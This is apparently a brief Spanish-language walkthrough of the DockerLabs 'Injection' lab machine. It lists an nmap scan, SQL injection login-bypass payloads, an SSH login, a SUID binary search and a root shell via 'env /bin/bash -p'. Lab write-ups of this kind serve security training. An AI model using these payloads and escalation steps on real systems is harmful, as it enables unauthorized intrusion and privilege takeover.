Injection
 |
|
| Máquina: Injection | |
| SO: Linux | |
| Nivel: Muy Facil | |
| DockerLabs |
1. Escaneando puertos y servicios de la maquina.
sudo nmap -p- -T5 -sCV --min-rate=5000 -n -Pn 172.17.0.2
2. Por el servicio apache encontramos un panel login.
http://172.17.0.2
3. Intento provocar un error en la query, ya sabiendo que se acontece una injection sql, bypasseo el login.
' or 1=1
'or 1=1-- -
4. Me conecto por ssh como dylan.
ssh dylan@172.17.0.2
5. Busco binarios SUID.
find / -perm -4000 2>/dev/null
6. Escalando privilegios, podemos aprovechar el binario env si lo buscamos en gtfobins.
/usr/bin/env /bin/bash -p
